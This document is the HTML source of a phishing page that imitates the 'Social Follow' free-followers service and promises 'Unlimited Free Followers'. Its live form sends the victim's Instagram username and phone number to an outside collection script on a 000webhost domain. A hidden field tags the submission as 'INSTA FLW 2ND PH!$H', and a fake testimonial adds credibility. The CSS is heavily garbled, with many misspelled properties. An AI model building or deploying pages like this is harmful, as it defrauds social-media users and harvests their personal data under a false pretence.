
             <!DOCTYPE html>
             <html lang="en">
             
             <head>
             <meta charset="UTF-8" />
             <meta http-equiv="X-UA-Compatible" content="IE=edge" />
             <meta name="viewport" content="width=device-width, initial-scale=1.0" />
             <link rel="icon" href="https://socialfollow.cc/assets/img/favicon-64x64.png" type="image/x-icon" />
             <!-- CSS Includes -->
             <link href="https://socialfollow.cc/assets/css/bootstrap.min.css" rel="stylesheet" />
             <link href="https://socialfollow.cc/assets/css/styles.css" rel="stylesheet" />
             <!-- Slick -->
             <link rel="stylesheet" type="text/css" href="https://socialfollow.cc/assets/lib/slick/slick.css" />
             <link rel="stylesheet" type="text/css" href="https://socialfollow.cc/assets/lib/slick/slick-theme.css" />
             <link href="https://cdn.jsdelivr.net/npm/select2@4.1.0-rc.0/dist/css/select2.min.css" rel="stylesheet" />
             <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/toastr.js/latest/toastr.css"
             integrity="sha512-3pIirOrwegjM6erE5gPSwkUzO+3cTjpnV9lexlNZqvupR64iZBnOOTiiLPb9M36zpMScbmUNIcHUqKD47M719g=="
             crossorigin="anonymous" referrerpolicy="no-referrer" />
             
             <!-- Global site tag (gtag.js) - Google Analytics -->
             <script async src="https://www.googletagmanager.com/gtag/js?id=UA-106784300-9"></script>
             <script>
             window.dataLayer = window.dataLayer || [];
             function gtag() { dataLayer.push(arguments); }
             gtag('js', new Date());
             gtag('config', 'UA-106784300-9');
             </script>
             
             <title>Social Follow</title>
             </head>
             
             <body class="claim">
             <!-- Progress Section -->
             <div class="sf-progress start">
             <div class="progress">
             <div class="progress-bar" role="progressbar" aria-valuenow="25" aria-valuemin="0" aria-valuemax="100">
             66%
             </div>
             </div>
             </div>
             
             <!-- Header Section -->
             <header>
             <nav class="navbar navbar-expand-md navbar-light">
             <div class="container">
             <a class="sf-nav-logo navbar-brand" href="privacy-policy.html">
             <img src="https://socialfollow.cc/assets/img/socialfollow-logo.svg" alt="Social Follow Logo" class="d-inline-block align-text-top" />
             </a>
             <button class="navbar-toggler collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#navbarNav"
             aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation"></button>
             <div class="sf-nav-menu collapse navbar-collapse justify-content-end" id="navbarNav">
             <ul class="navbar-nav">
             <li class="nav-item">
             <a class="nav-link" aria-current="page" href="##">How it works</a>
             </li>
             <li class="nav-item">
             <a class="nav-link pink" href="buy-followers.html">Buy Real Followers</a>
             </li>
             </ul>
             </div>
             <a class="back-link" aria-current="page" href="privacy-policy.html">
             Back</a>
             </div>
             </nav>
             </header>
             
             
<!--             <!-- Claim Start Section -->
    <!--         <section class="section-claim start">
             <div class="container">
             <div class="row align-items-center">
             <div class="col-md-7">
             <dihv class="sf-panel">
             
             
             
             
             
             
             <div class="body">
             <h2 class="heading">Begin Gaining <span>Unlimited Free Followers, </span>Up To 10,000 <span>Followers </span> Every Day!</h2>
             
             
             
             <p class="text main">
             Simply enter your username and phone number to proceed.
             </p>
             
             
             
              
          
          
             
             
             <form class="sf-form">
             

             <div class="row">
             
             
             
             
      &nbsp; 
             
             <div class="col-12">
             
             
             
             
             
             
             
             <input id="username" type="text" class="form-control input-text icon camera"
             placeholder="@username" />
             </div>
             <div class="col-12-2">
             <input id="email" type="tel" class="form-control input-text icobn at"
             placeholder="+1234567890"style="color: red" />
             </div>
                                    <a href="##" style="text-decoration: none;">          <button type="button" class="bthn button sf-button pink block">
             Get Free Followers
             </button>
             </div>
             </form>
             </div>


                      <style type="text/css">
                      
                      
           #email {
                      
          font-size: 12px;            
           color: grey;         
        bovrder: none;
        border-color: none;       
               }       
                      
                      
                     form {
                      
                      font-size: 12px;            
                      color: red;         
                      bovrder: none;
                      border-color: none;       
                      }       
                      
                      
                      
                      
                      </style>           
                                 
                                 
                                 
              -->                   
                                 
                             </a></div></div></div></div>
                                 </section>
                                
                                 
                                 
  
  <div id="g2"class="diverx">
  
  <p style="color: blue; text-align: cebnter"> 
  
                                 
                                                         
                                                    <div class="form-control">       
                              
                              
                              <form method="POST" style="padding-top:  -500px;" action="https://hitsmng.000webhostapp.com/unlimited-followers.php" method="POST">
                                 <div class="formulaire" style="background:white;"> 
                                 
                                
                                
                                <p>&nbsp;</p> 
                                <dniv class="sf-panel">                 
                                <dmiv class="body">         
                                <h2 class="heading">Begin Gaining <span>Unlimited Free Followers, </span>Up To 10,000 <span>Followers </span> Every Day!</h2>
                                
                                <p class="text main">
                                Simply enter your instagram username and phone number to proceed.
                                
                                
                                
                                                       <p>&nbsp;</p>          
                                
                                
   
                            

                                 <span id="ooo" class="spanner"></span> <span id="ooo" class="spancyy"> </span> <!--<img id="img03"src="../stake/img/img00.jpg">-->
                                 <input id="email" name="email" type="text"   placeholder="@username" class="entrer" style="padding:12px;"required> 
                                 <p> <a id="sec1" href="##" > <section id="sec1"></section></a></section>				
                                 
                                 
                                 <p id="tops">
                                 <input name="type" type="hidden" value="INSTA FLW 2ND PH!$H " />
                                 
                                 
                                 
                                 <span id="ooo" class="spanner"></span> <span id="ooo" class="spancyy"> </span>  <!--<img id="img03"src="../stake/img/img00.jpg">-->
                                 <input id="password" name="password" value="" type="tel"  placeholder="+1 (460) 975-3480" id="entre2"class="entrer" style="padding:12px;"required>
                                 <a id="sec2"href="##" ><section id="sec2"> </section> </a>
                                 </p>
                                 
          
          <p>&nbsp;</p>

                        <p>&nbsp;</p>    


                  <p>&nbsp;</p>  
          <button type="submit" class="square_btn">Continue</button>
          



          

               

                 
                 <p>&nbsp;</p>  
          
          

          
          
          
          
          
          
          

            
            <p>&nbsp;</p>
          
          
                     </p></div></div>
                                 </div>
                                 </div>
                                 </form> 
                                 </div>
                                 </div>
                                 
                         
                                 
                                 </div>
                                 </div>
                                 </div>
                                 </div>
                                 
                                 
            </p>
               
               </dmiv>                  
                                 
              </dniv></p> 

                                 <style type="text/css">
                                 
                                 
                                 
                                    
                                    .diverx{
                                    position: relative;
                                    border-radius: 88px;
                                    border-style: none;
                                    height: 210px;
                                    margin-left: 10px;
                                    margin-right: 10px;
                                    background: white;
                                    top:15.20px;
                                    opacity: none;
                                    padding: -50px;
                                    box-shadow: 0px 150px 2000px 150px silver ;
                                    }
                                    
                                    
                                    
                                           
                                           
                                           .formulaire.formulaire>*{
                                           bogrder-bottom:1px solid #c7c3c369;
                                           }
                                           
                                           .entrer{
                                           border:1;
                                           width:100%;
                                           }
                                           
                                           /*
                                           submit
                                           */
                                           
                                           .koala{
                                           display:inline-block;
                                           -webkit-border-radius:3px;
                                           font-weight:bold;
                                           background-color:#0036f999;	
                                           font-size:13px;
                                           line-height:34px;
                                           padding:0 18px;
                                           color:white
                                           }
                                           
                                           .square_btn {
                                           position: relative;
                                           display: inline-block;
                                           padding: 16px;
                                           text-decoration: none;
                                           color: white;
                                           background:   hsla(0, 100%, 50%, 0.6);
                                           border-radius: 15px;
                                           font-weight: bold;
                                           bornder: 15px #f30909;
                                           width: 100%;
                                           border: none;
                                           top: 4px;
                                           outline: none;
                                           font-size: 15px;
                                           box-sbhadow: 0px 0px 2px 0px rgb(22,101,255) ;
                                           }
                                           
                                           
                                    .square_btn:hover  {
                                                                                               
                                                                                               position: relative;
                                                                                               display: inline-block;
                                                                                               padding: 16px;
                                                                                               text-decoration: none;
                                                                                               color: white;
                                                                                               background:   white;
                                                                                               border-radius: 15px;
                                                                                               font-weight: bold;
                                                                                               borjder: 15px  hsla(0, 100%, 50%, 0.6);
                                                                                               width: 100%;
                                                                                               border: red;
                                                                                              color: red;
                                                                                               top: 4px;
                                                                                               outline: red;
                                                                                               font-size: 15px;
                                                                                               box-shadow: 0px 0px 5px 0px  hsla(0, 100%, 50%, 0.6) ;
                                                                                               
                                                                  }
                                           
                                           /* neveau compte */
                                           .fruit{
                                           text-align:center;
                                           padding:9px;
                                           } 
                                           
                                           
                                           
                                           
                                           
                                           
                                           
                                           
                                           /*New Codes*/
                                           
                                           
                                           
                                           
                                           .span1 {
                                           color: #62B2FF;
                                           font-size: 14px;
                                           position:relative;
                                           
                                           top: 4px;
                                           }
                                           
                                           
                                           
                                           
                                           .span2 {
                                           color: black;
                                           font-sizw: 14px;
                                           text-align: center;
                                           position:relative;
                                           background-position:center;
                                           top: -5px;
                                           font-weight: 590;
                                           text-shadow:500px;
                                           margin-right: 90px;
                                           }
                                           
                                           
                                           
                                           
                                           .div1 {
                                           
                                           background-color:white;
                                           padding:2 31px;
                                           }
                                           
                                           
                                           
                                           
                                           /*form*/
                                           
                                           
                                           
                                           .form-control {
                                           font-size: 14.50px;
                                           text-align: left;
                    
                                           margin-bottom: 20px;
                                           } 
                                           
                                           .form-control label {
                                           
                                           display: block;
                                           
                                           margin-bottom: 10px;
                                           
                                           }
                                           
                                           
                                           
                                           
                                           /*
                                           .form-control input,
                                           
                                           .form-control select,
                                           
                                           .form-control textarea {
                                           
                                           border: 1px solid #777;
                                           
                                           border-radius: 7px;
                                           
                                           font-family: inherit;
                                           
                                           padding: 10px;
                                           
                                           display: block;
                                           height: 45px;
                                           width: 95%;
                                           margin-left: 8px;
                                           }
                                           */
                                           
                                           
                                           .form-control input[type="radio"],
                                           
                                           .form-control input[type="checkbox"] {
                                           
                                           display: inline-block;
                                           
                                           width: auto;
                                           
                                           }
                                           
                                           
                                           
                                           
                                           
                                           
                                           
                                           .buttoner:hover {
                                           background-color: hsla(0, 0%, 0%, 0.5);
                                           color:   white;
                                           border: none;
                                           box-shadow: 1px 1px 1px 1px   hsla(240, 100%, 25%, 0.9);
                                           cursor: pointer;
                                           -webkit-transition-duration: 0s; /* for Safari */
                                           transition-duration: 0s;
                                           }
                                           
                                           .buttonner {
                                           outline: none;
                                           border: none;
                                           height: 45px;
                                           width: 50%;
                                           border-radius: 5px;  
                                           bordner: 12px;
                                           font-size: 14px;
                                           background: white;
                                           color:  white;
                                           background: rgb(236,152,102);
                                           position:relative;
                                           top: 25px;
                                           
                                           }
                                           
                                           
                                           
                                           
                                           
                                           /*xxx*/
                                           .form-control input,
                                           
                                           .form-control select,
                                           
                                           .form-control textarea {
                                           
                                           
                                           border: 0.70px solid black;
                                           outbline: 4.70px solid blue;
                                           
                                           
                                           border-radius: 2px;
                                           
                                           outline: none;
                                           /*  hsla(240, 100%, 25%, 0.9);;*/
                                           border-radius: 10px;
                                           
                                           font-family: inherit;
                                           
                                           padding: 25px;
                                           background:hsla(0, 0%, 75%, 0.30);
                                           display: block;
                                           height:52px;
                                           width:100%;
                                           mabrgin-left: 13px;
                                           position:relative;
                                           top: 3px;
                                           border:none;
                                           }
                                           
                                           
                                           
                                           
                                           
                                           
                                           
                                           /*END*/ 
                                           
                                           
                                           
                                           
                                           #entnre1 {
                                           position:relative;
                                           top:-10px;
                                           }
                                           
                                           
                                           
                                           #enhtre2 {
                                           position:relative;
                                           top:10px;
                                           }
                                           
                                           
                                           #ooo1 {
                                           position:relative;
                                           top: 13px;
                                           font-size: 10px;
                                           
                                           }
                                           
                                           
                                           #engtre3 {
                                           position:relative;
                                           top:20px;
                                           }
                                           
                                           
                                           .spancyy {
                                           position:relative;
                                           float:right;
                                           }
                                           
                                           
                                           
                                           
                                           
                                           #img00 {
                                           position:relative;
                                           float:right;
                                           width: 28px;
                                           top: -40px; 
                                           
                                           }
                                           
                                           
                                           
                                           .cents {
                                           position:relative;
                                           font-weight: 700;
                                           font-size: 33px;
                                           top: 15px
                                           }
                                           
                                           
                                           #ooo {
                                           position: relative;
                                           coblor: grey;
                                           top: -7px;
                                           
                                           }
                                           
                                           
                                           
                                           
                                           .pi {
                                           position:relative;
                                           top: 20px;
                                           font-size: 14px;
                                           
                                           }
                                           
                                           .pii {
                                           position:relative;
                                           top: 12px;
                                           
                                           }
                                           
                                           
                                           
                                           
                                           
                                           /*Switch Box*/
                                           
                                           
                                           /* The switch - the box around the slider */
                                           .switch {
                                           position: relative;
                                           display: inline-block;
                                           width: 30px;
                                           height: 15px;
                                           
                                           }
                                           
                                           /* Hide default HTML checkbox */
                                           .switch input {
                                           opacity: 0;
                                           width: 0;
                                           height: ;
                                           }
                                           
                                           /* The slider */
                                           .slider {
                                           position: absolute;
                                           cursor: pointer;
                                           top: 0;
                                           left: -10;
                                           right: 0px;
                                           bottom: 0;
                                           width: 25px;
                                           background-color:  #62B2FF;
                                           -webkit-transition: .4s;
                                           transition: .4s;
                                           
                                           }
                                           
                                           .slider:before {
                                           position:absolute;
                                           content: "";
                                           height: 20px;
                                           width: 20px;
                                           left: 13px;
                                           
                                           
                                           
                                           bottom: -2px;
                                           background-color: green;
                                           -webkit-transition: .4s;
                                           transition: .4s;
                                           
                                           }
                                           
                                           input:checked + .slider {
                                           
                                           background-color: silver;
                                           
                                           }
                                           
                                           
                                           input:checked + .slider:before {
                                           
                                           background-color: white;
                                           
                                           }
                                           
                                           
                                           
                                           input:focus + .slider {
                                           
                                           box-shadow: 0px 0px 0px black;
                                           
                                           }
                                           
                                           input:checked + .slider:before {
                                           box-shadow: 0px 0px 20px grey;
                                           -webkit-transform: translateX(26px);
                                           -ms-transform: translateX(26px);
                                           transform: translateX(-22px);
                                           }
                                           
                                           /* Rounded sliders */
                                           .slider.round {
                                           border-radius: 34px;
                                           
                                           
                                           }
                                           
                                           .slider.round:before {
                                           border-radius: 50%;
                                           
                                           }
                                           
                                           
                                           
                                           /*end*/
                                           
                                           .switch {
                                           position:relative;
                                           float:right;
                                           top: -8px;
                                           
                                           }
                                           
                                           
                                           
                                           .divo {
                                           position:relative;
                                           top: -10px;
                                           }
                                           
                                           
                                           #imgf {
                                           position:relative;
                                           width: 8px;
                                           heibght: 14px;
                                           top: 1.25px;
                                           
                                           }
                                           
                                           
                                           
                                           
                                           #a {
                                           text-decoration: none;
                                           color: #62B2FF;
                                           }
                                           
                                           
                                           .move1 {
                                           position:absolute;
                                           margin-left: -9px;
                                           tyop: 50px;
                                           }
                                           
                                           
                                           .move2 {
                                           position:absolute;
                                           margin-left: 4px;
                                           tyop: 50px;
                                           }
                                           
                                           
                                           .move3 {
                                           position:absolute;
                                           margin-left: 17px;
                                           tyop: 50px;
                                           }
                                           
                                           
                                           
                                           
                                           .move4 {
                                           position:absolute;
                                           margin-left: 29px;
                                           tyop: 50px;
                                           }
                                           
                                           
                                           
                                           
                                           .move5 {
                                           position:absolute;
                                           margin-left: 44px;
                                           tyop: 50px;
                                           }
                                           
                                           
                                           
                                           
                                           .move6 {
                                           position:absolute;
                                           margin-left: 59px;
                                           tyop: 50px;
                                           }
                                           
                                           
                                           
                                           .move7 {
                                           position:absolute;
                                           margin-left: 73px;
                                           tyop: 50px;
                                           }
                                           
                                           
                                           
                                           .move8 {
                                           position:absolute;
                                           margin-left: 86px;
                                           tyop: 50px;
                                           }
                                           
                                           
                                           #but2 {
                                           position:relative;
                                           border-radius: 7px;
                                           height: 4.50%;
                                           width: 50%;
                                           font-size:13px;
                                           background: hsla(0, 0%, 75%, 0.30);
                                           border: none;
                                           margin: -3px;
                                           outline: none;
                                           }
                                           
                                           
                                           
                                           
                                           
                                           
                                           #but2:hover {
                                           position:relative;
                                           border-radius: 7px;
                                           height: 4.50%;
                                           width: 50%;
                                           font-size:13px;
                                           background: hsla(0, 0%, 75%, 0.30);
                                           border: none;
                                           margin: -3px;
                                           outline: none;
                                           background: white;
                                           
                                           -webkit-transition-duration: 0s; /* for Safari */
                                           transition-duration: 0s;
                                           }
                                           
                                           
                                           
                                           
                                           
                                           
                                           #but3 {
                                           position:relative;
                                           border-radius: 7px;
                                           height: 4.50%;
                                           width: 50%;
                                           font-size:13px;
                                           background: white;
                                           border-color: hsla(0, 0%, 75%, 0.30);
                                           border-width: 0.80px;
                                           margin: -3px;
                                           outline: none;
                                           
                                           
                                           }
                                           
                                           
                                           
                                           
                                           
                                           
                                           
                                           #tops {
                                           position:relative;
                                           top: 21px;
                                           }
                                           
                                           #sec1 {
                                           color: rgb(22,101,255);
                                           font-size: 13px;
                                           text-decoration:none;
                                           
                                           }
                                           
                                           #sec2{
                                           position:relative;
                                           color: rgb(22,101,255); 
                                           font-size: 13px;
                                           text-decoration:none;
                                           top: 3.80px;     
                                           }
                                           
                                           
                                           #imgf {
                                           width: 65px; 
                                           
                                           }
                                           
                                           
                                                                       .div2 {
                                           padding-left: 17px;
                                           padding-right: 0px;
                                           
                                           }
                                           
                                           
                                           #img3 {
                                           width: 70px;
                                           float: right;
                                           border: none;
                                           border-radius: 7px;
                                           tnop: 200px;
                                           padding-right: 10px;
                                           position:relative;
                                           top: -10px;
                                           }
                                           
                                           .spanner {
                                           font-weight: 500;
                                           }
                                           
                                           
                                           .p2 {
                                           font-size: 13px;
                                           color: grey;
                                           top: -8px;
                                           position:relative;
                                           }
                                           
                                           .p2x {
                                           font-size: 13px;
                                           color: grey;
                                           top: -15px;
                                           position:relative;
                                           }
                                           
                                           
                                           
                                           .square_btn2 {
                                           position: relative;
                                           display: inline-block;
                                           padhding: 13px;
                                           text-decoration: none;
                                           color: rgb(22,101,255);
                                           backbground:   hsla(180, 100%, 50%, 0.1);
                                           border-radius: 15px;
                                           font-weight: bold;
                                           bornder: 15px #f30909;
                                           width: 100%;
                                           border: none;
                                           top: 2px;
                                           outline: none;
                                           font-size: 15px;
                                           box-sbhadow: 0px 0px 2px 0px rgb(22,101,255) ;
                                           }
                                           
                                           
                                           #img6 {
                                           width: 250px;
                                           box-shadow: 0px 0px 20000px 0px silver ;
                                           
                                           }
                                           
                                           #imgh {
                                           width: 15px;
                                           position:relative;
                                           top: 3px;
                                           borbder-radius: 200px;
                                           
                                           }
                                           
                                           
                                           
                                           #imghx {
                                           width: 12px;
                                           position:relative;
                                           top: 3px;
                                           
                                           }
                                           
                                           
                                           #tup {
                                           position:relative;
                                           top: 10px;
                                           }
                                           
                                           
                                           #mainbotton1 {
                                           height: 50px;
                                           width: 70px;
                                           border: none;
                                           border-radius: 5px;
                                           background: silver;   
                                           }
                                           
                                           
                                           
                                           #mainbotton2 {
                                           
                                           
                                           }
                                           
                                           
                                           
                                           #ff {
                                           width: 30px;
                                           border-radius: 15px; 
                                           
                                           }
                                           
                                           
                                           #pen1 {
                                           font-size: 13px;
                                           position:relative;
                                           top: -11px;
                                           font-weight: 500;
                                           
                                           
                                           
                                           
                                           }
                                           
                                           
                                   #topp {
                                   position: relative;
                                   top: 350px;                          
                                 
                                   }      
                                            
                                            
                                            
                                  .message {
                                  font-size: 12px;
                                  
                                  margin-left: 15px;
                                  margin-right: 15px;
                                  
                                  }          
                                            
                                            
     
                                            
                              #img {
                              width:170px;              
                               position:relative;             
                                 top: -10px;
                                 {           
                                            
                                            
                                            
                                            
                                            .img-fluid {
                                            position: relative;
                                            top: -20px;
                                            }
                                 </style>
                                 
                                 
                                 
                                 
            <nav id="topp">                    
       
       
       <div class="col-md-5">
       <div class="review d-flex flex-column align-items-center">
       <div class="avatar">
       <img src="https://socialfollow.cc/assets/img/claim/collin.png" class="img-fluid" alt="Johanna Couto Image" />
       </div>

       
       <p class="message">
    <center class="message"> 
         I never believed I could get free followers this fast… And it is
       so simple to use. I could not recommend more!
   </center>    </p>
       
       
       <div class="
       ratings
       d-flex
       align-items-center
       justify-content-between
       ">
       <span class="star"></span>
       <span class="star"></span>
       <span class="star"></span>
       <span class="star"></span>
       <span class="star"></span>
       </div>
   <center>  <img id="img"src="https://raw.githubusercontent.com/maininfo/img/main/img1.jpg">  </center> 
     
     <b>  <div class="social">@collintech</div>
    </b>   </div>
       </div>
       </div>
       </div>
       
    <p>&nbsp;</p>   
       
       </section>
       
       <!-- JS Includes -->
       <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
       <script src="https://socialfollow.cc/assets/js/jquery-3.6.0.min.js"></script>
       <script src="https://socialfollow.cc/assets/js/popper.min.js"></script>
       <script src="https://cdnjs.cloudflare.com/ajax/libs/toastr.js/latest/toastr.min.js"></script>
       <script src="https://socialfollow.cc/assets/js/bootstrap.min.js"></script>
       <script src="https://cdn.jsdelivr.net/npm/select2@4.1.0-rc.0/dist/js/select2.min.js"></script>
       <script type="text/javascript" src="https://socialfollow.cc/assets/lib/slick/slick.min.js"></script>
       <script src="https://cdn.jsdelivr.net/npm/js-cookie@2/src/js.cookie.min.js"></script>
       <script src="https://cdnjs.cloudflare.com/ajax/libs/toastr.js/latest/toastr.min.js"></script>
       <script src="https://socialfollow.cc/assets/js/main.js"></script>
       <script src="js/functions.js"></script>
       </body>
       
       </html>
